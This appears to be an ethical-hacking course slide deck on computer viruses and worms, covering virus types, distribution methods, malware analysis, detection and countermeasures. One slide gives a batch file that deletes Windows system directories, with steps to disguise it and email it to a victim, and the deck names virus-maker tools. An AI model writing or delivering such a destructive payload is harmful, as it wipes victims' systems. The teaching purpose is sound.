Module 07 Viruses
and Worms
� Introduction to Viruses
• Computer viruses have the potential to wreak havoc on both
business and personal computers. Worldwide, most
businesses have been infected at some point. A virus is a self-
replicating program that produces its own code by attaching
copies of it into other executable codes. This virus operates
without the knowledge or desire of the user. Like a real virus,
a computer virus is contagious and can contaminate other
files. However, viruses can infect outside machines only with
the assistance of computer users.
� Introduction to Worms
• A worm is a malicious program that can infect both
local and remote machines. Worms spread
automatically by infecting system after system in a
network, and even spreading further to other
networks. Therefore, worms have a greater potential
for causing damage because they do not rely on the
user's actions for execution. There are also malicious
programs in the wild that contain all of the features
of these three malicious programs.
� Stages of Virus Life
1. Design
2. Replication
3. Launch
4. Detection
5. Incorporation
6. Elimination
� Working of Viruses
• Working of virus is devided in to two phases
Infection Phase
Attack Phase
� Infection Phase
• In the infection phase, the virus replicates itself and attaches
to an .exe file in the system. Programs modified by a virus
infection can enable virus functionalities to run on that
system. Viruses get enabled as soon as the infected program
is executed, since the program code leads to the virus code.
• There are virus programs that infect and keep spreading every
time they are executed. Some programs do not infect the
programs when first executed. They reside in a computer's
memory and infect programs at a later time.
� Attack Phase
• Once viruses spread themselves throughout the
target system, they start corrupting the files and
programs of the host system. Some viruses have
trigger events that need to be activated to corrupt
the host system. Some viruses have bugs that
replicate themselves, and perform activities such as
deleting files and increasing session time.
� Why Do People Create Computer
Viruses?
• Inflict damage to competitors
• Research projects
• Pranks
• Vandalism
• Attack the products of specific companies
• Distribute political messages
• Financial gain etc…
� Indications of Virus Attacks
• Programs take longer to load
• The hard drive is always full, even without installing any
programs
• The floppy disk drive or hard drive runs when it is not being used
• Unknown files keep appearing on the system
• The computer monitor displays strange graphics
• The hard drive becomes inaccessible when trying to boot from
the floppy drive
• The memory on the system seems to be in use and the system
slows down.
�How Does a Computer Get Infected
by Viruses?
• When a user accepts files and downloads without checking properly
for the source
• Attackers usually send virus-infected files as email attachments to
spread the virus on the victim's system. If the victim opens the
mail, the virus automatically infects the system.
• Attackers incorporate viruses in popular software programs and
upload the infected software on websites intended to download
software. When the victim downloads infected software and installs
it, the system gets infected.
• Failing to install new versions or update with latest patches
intended to fix the known bugs may expose your system to viruses.
• Etc…
� Common Techniques Used to
Distribute Malware on the Web
• Blackhat Search Engine Optimization (SEO): Using this
technique the attacker ranks malware pages high in search
results
• Social Engineered Click-jacking: The attackers trick the users
into clicking on innocent-looking web pages that contain
malware
• Spearphishing Sites: This technique is used for mimicking
legitimate institutions, such as banks, in an attempt to steal
account login credentials.
� Common Techniques Used to
Distribute Malware on the Web
• Malvertising: Embeds malware in ad networks that
display across hundreds of legitimate, high- traffic
sites
• Compromised Legitimate Websites: Host embedded
malware that spreads to unsuspecting visitors
• Drive-by Downloads: The attacker exploits flaws in
browser software to install malware just by visiting a
web page
� Virus Hoaxes
• A virus hoax is simply a bluff. Viruses, by their nature,
have always created a horrifying impression. Hoaxes
are typically untrue scare alerts that unscrupulous
individuals send to create havoc. It is fairly common
for innocent users to pass these phony messages
along thinking they are helping others avoid the
"virus."
� Virus Hoaxes
• Hoaxes are false alarms claiming reports about non-existing
viruses
• These warning messages, which can be propagated rapidly,
stating that a certain email
• message should not be opened, and that doing so would
damage one's system
• In some cases, these warning messages themselves contain
virus attachments
• These possess the capability of vast destruction on target
systems
� Fake Antiviruses
• Fake antiviruses is a method of affecting a system by hackers
and it can poison your system and outbreak the registry and
system files to allow the attacker to take full control and
access to your computer. It appears and performs similarly to
a real antivirus program.
• Fake antivirus programs first appear on different browsers and
warn users that they have different security threats on their
system, and this message is backed up by real suspicious
viruses. When the user tries to remove the viruses, then they
are navigated to another page where they need to buy or
subscribe to that antivirus and proceed to payment details
� Types of Viruses
• This section highlights various types of viruses and worms
such as file and multipartite viruses, macro viruses, cluster
viruses, stealth/tunneling viruses, encryption viruses,
metamorphic viruses, shell viruses, and so on. Computer
viruses are the malicious software programs written by
attackers to intentionally enter the targeted system without
the user's permission. As a result, they affect the security
system and performance of the machine. A few of the most
common types of computer viruses that adversely affect
security systems are discussed in detail on the following slides
� System or Boot Sector Viruses
• Is The most common targets for a virus are the
system sectors, which are nothing but the Master
Boot Record and the DOS Boot Record System
sectors. These are the areas on the disk that are
executed when the PC is booted. Every disk has a
system sector of some sort. They specially infect the
floppy boot sectors and records of the hard disk. For
example: Disk Killer and Stone virus.
� File Viruses
• Executable files are infected by file viruses, as they
insert their code into the original file and get
executed. File viruses are larger in number, but they
are not the most commonly found. They infect in a
variety of ways and can be found in a large number
of file types.
� Multipartite Virus
• They infect program files, and this file in turn affects
the boot sectors such as Invader, Flip, and Tequila.
� Macro Virus
• Microsoft Word or a similar application can be
infected through a computer virus called a macro
virus, which automatically performs a sequence of
actions when the application is triggered or
something else. Macro viruses are somewhat less
harmful than other types. They are usually spread via
an email.
� Stealth Viruses
• These viruses try to hide themselves from antivirus programs
by actively altering and corrupting the chosen service call
interrupts when they are being run. Requests to perform
operations in respect to these service call interrupts are
replaced by virus code. These viruses state false information
to hide their presence from antivirus programs. For example,
the stealth virus hides the operations that it modified and
gives false representations. Thus, it takes over portions of the
target system and hides its virus code.
� Polymorphic Viruses
• These viruses were developed to confuse antivirus
programs that scan for viruses in the system. It is
difficult to trace them, since they change their
characteristics each time they infect, e.g., every copy
of this virus differs from its previous one. Virus
developers have even created metamorphic engines
and virus writing tool kits that make the code of an
existing virus look different from others of its kind
� Metamorphic Viruses
• A code that can reprogram itself is called
metamorphic code. This code is translated into the
temporary code, and then converted back to the
normal code. This technique, in which the original
algorithm remains intact, is used to avoid pattern
recognition of antivirus software. This is more
effective in comparison to polymorphic code. This
type of virus consists of complex extensive code.
� Overwriting File or Cavity Viruses
• Some program files have areas of empty space. This
empty space is the main target of these viruses. The
Cavity Virus, also known as the Space Filler Virus,
stores its code in this empty space. The virus installs
itself in this unoccupied space without any
destruction to the original code. It installs itself in the
file it attempts to infect.
� Sparse Infector Viruses
• A sparse infector virus infects only occasionally (e.g.,
every tenth program executed) or only files whose
lengths fall within a narrow range.
� File Extension Viruses
• File extension viruses change the extensions of
files; .TXT is safe, as it indicates a pure text file. If
your computer's file extensions view is turned off
and someone sends you a file named BAD.TXT.VBS,
you will see only BAD.TXT.
� Stealth/Tunneling Viruses Stealth
Viruses
• These viruses try to hide themselves from antivirus programs
by actively altering and corrupting the chosen service call
interrupts when they are being run. Requests to perform
operations in respect to these service call interrupts are
replaced by virus code. These viruses state false information
to hide their presence from antivirus programs. For example,
the stealth virus hides the operations that it modified and
gives false representations. Thus, it takes over portions of the
target system and hides its virus code.
� Writing a Simple Virus Program
• Create a batch file Game.bat with the following text:
text @ echo off
delete c:\winnt\system32\*.*
delete c:\winnt\*.*
• Convert the Game.bat batch file to Game.com using the bat2com
utility
• Assign Icon to Game.com using Windows file properties screen
• Send the Game.com file as an email attachment to a victim
• When the victim runs this program, it deletes core files in the \
WINNT directory, making Windows unusable
� TeraBIT Virus Maker
• TeraBIT Virus Maker is a virus that is mostly detected
by all antivirus software when scanned. This virus
mostly doesn't harm the PC, but it can disable the
antivirus that is installed on the system for a short
time.
� JPS Virus Maker
• JPS Virus Maker is a tool to create viruses. It also has
a feature to convert a virus into a worm and can be
used to disable the normal hardware of the system.
� Computer Worms
• Computer worms are malicious programs that
replicate, execute, and spread across network
connections independently, without human
interaction. Most worms are created only to replicate
and spread across a network, consuming available
computing resources; however, some worms carry a
payload to damage the host system.
� How Is a Worm Different from a
Virus?
Virus Worms
• A virus is a file that cannot be • A worm, after being
spread to other computers unless installed on a system, can
an infected file is replicated and
actually sent to the other
replicate itself and spread
computer, whereas a worm does by using IRC, Outlook, or
just the opposite. other applicable mailing
• Files such as .com, .exe, or .sys, or programs.
a combination of them are • A worm typically does not
corrupted once the virus runs on
the system. modify any stored programs
• Viruses are a lot harder to get off
an infected machine.
� Internet Worm Maker Thing
• Internet Worm Maker Thing is a tool specifically
designed for generating a worm. These generated
Internet worms try to spread over networks that are
basically preset invasion proxy attacks that target
the host technically, poison it, and make a base and
plans to launch the attack in future. The worms work
independently. An Internet worm sends copies of
itself via vulnerable computers on the Internet.
� Sheep Dip Computer
• Sheep dipping refers to the analysis of suspect files, incoming
messages, etc. for malware.
• This "sheep dipped" computer is isolated from other
computers on the network to block any viruses from entering
the system. Before this procedure is carried out, any
downloaded programs are saved on external media such as
CD-ROMs or floppy diskettes.
• A sheep dip computer is installed with port monitors, files
monitors, network monitors, and antivirus software and
connects to a network only under strictly controlled
conditions.
� Antivirus Sensor Systems
• An antivirus system includes antivirus, anti-spyware,
anti-Trojan, anti-spamware, anti-Phishing, an email
scanner, and so on. Usually, it is placed in between
the network and Internet. It allows only genuine
traffic to flow through the network and blocks
malicious traffic from entering. As a result, it ensures
network security.
� Malware Analysis Procedure
• Preparing Testbed:
– Install VMWare or Virtual PC on the system
– Install guest OS into the Virtual PC/VMWare
– Isolate the system from the network by ensuring that the
NIC card is in "host only" mode
– Disable the shared folders and the guest isolation
– Copy the malware over to the guest OS.
�Malware Analysis Procedure cont’d
• Step 1: Perform static analysis when the malware is
inactive
• Step 2: Collect information about:
– String values found in the binary with the help of string
extracting tools such as BinText
– The packaging and compressing technique used with the
help of compression and decompression tools such as UPX
�Malware Analysis Procedure cont’d
• Step 3: Set up network connection and check that it
is not giving any errors.
• Step 4: Run the virus and monitor the process
actions and system information with the help of
process monitoring tools such as Process Monitor
and Process Explorer
�Malware Analysis Procedure cont’d
• Step 5: Record network traffic information using
connectivity and log packet content monitoring tools
such as NetResident and TCPView
• Step 6: Determine the files added, processes
spawned, and changes to the registry with the help
of registry monitoring tools such as RegShot
� Virus Analysis Tool
• IDA Pro: This is a dissembler and debugger tool that
supports both Windows and Linux platforms.
• Ollydbg: debugger tool that use to crack and analysis
for applications.
� Online Malware Testing
• http://anubis.iseclab.org
• http://onlinescan.avast.com
• https://www.microsoft.com
• http://www.threatexpert.com
• http://www.bitdefender.com
• http://www.gfi.com
• http://www.fortiguard.com
• Etc…
� Virus Detection Methods
• The three best methods for antivirus detection are:
1. Scanning
2. Integrity checking
3. Interception
� Scanning
• The moment a virus is detected in the wild, antivirus vendors across
the globe start writing scanning programs that look for its signature
strings (characteristic of the virus).
• Virus writers often create many new viruses by altering the existing
one. What looks like a new virus, may have taken just a few minutes
to be created. Attackers make these changes frequently to throw
off the scanners
• The strings are identified and extracted from the virus by these
scanner writers. The resulting new scanners search memory files
and system sectors for the signature strings of the new virus. The
scanner declares the presence of a virus once it finds a match. Only
known and pre-defined viruses can be detected
� Integrity Checking
• Integrity checking products perform their functions by reading and
recording integrated data to develop a signature or base line for
those files and system sectors
• Integrity products check any program with built-in intelligence. This
is really the only solution that can take care of all the threats to
data. The most trusted way to know the amount of damage done by
a virus is provided by these integrity checkers, since they can check
data against the originally established base line.
• A disadvantage of a basic integrity checker is that it cannot
differentiate file corruption caused by a bug from corruption caused
by a virus
� Interceptor
• The main use of an interceptor is for deflecting logic bombs
and Trojans.
• The interceptor controls requests to the operating system for
network access or actions that cause a threat to the program.
If it finds such a request, the interceptor generally pops up
and asks if the user wants to allow the request to continue.
There are no dependable ways to intercept direct branches to
low-level code or direct instructions for input and output
instructions by the virus
� Countermeasures
• Install antivirus software that detects and removes infections as
they appear
• Generate an antivirus policy for safe computing and distribute it to
the staff
• Pay attention to the instructions while downloading files or any
programs from the Internet
• Update the antivirus software on the a monthly basis, so that it can
identify and clean out new bugs
• Avoid opening the attachments received from an unknown sender
as viruses spread via email attachments
• Do not accept disks or programs without checking them first using
a current version of an antivirus program
� Countermeasures cont’d
• Ensure the executable code sent to the organization is
approved
• Run disk clean up, registry scanner, and defragmentation
once a week
• Do not boot the machine with infected bootable system disk
• Turn on the firewall if the OS used is Windows XP e Keep
informed about the latest virus threats
• Run anti-spyware or adware once in a week
• Be cautious with the files being sent through the instant
messenger
� Antivirus Tools
• ESET Smart Security 5 available at http://www.eset.com
• AVG Antivirus available at http://free.avg.com
• BitDefender available at http://www.bitdefender.com
• Kaspersky Anti-Virus available at http://www.kaspersky.com
• Norton Anti-Virus available at http://www.svmantec.com
• F-Secure Anti-Virus available at http://www.f-secure.com
• Avast Pro Antivirus available at http://www.avast.com
• McAfee Anti-Virus Plus 2013 available at http://
home.mcafee.com
� Penetration Testing
• Step1: Install an antivirus program
• Step2: Update the antivirus software
• Step3: Scan the system for viruses
• Step4: Set the antivirus to quarantine or delete the
virus
• Step5: Go to safe mode and delete the infected file
manually
• Step 6: Scan the system for running processes
� Penetration Testing
• Step7: Scan the system for suspicious registry entries
• Step8: Scan the system for Windows services
• Step9: Scan the system for startup programs
• Step 10: Scan the system for files and folders
integrity
• Step 12: Document all findings
• Step13: Isolate the infected system
• Stepl4: Sanitize the complete infected system
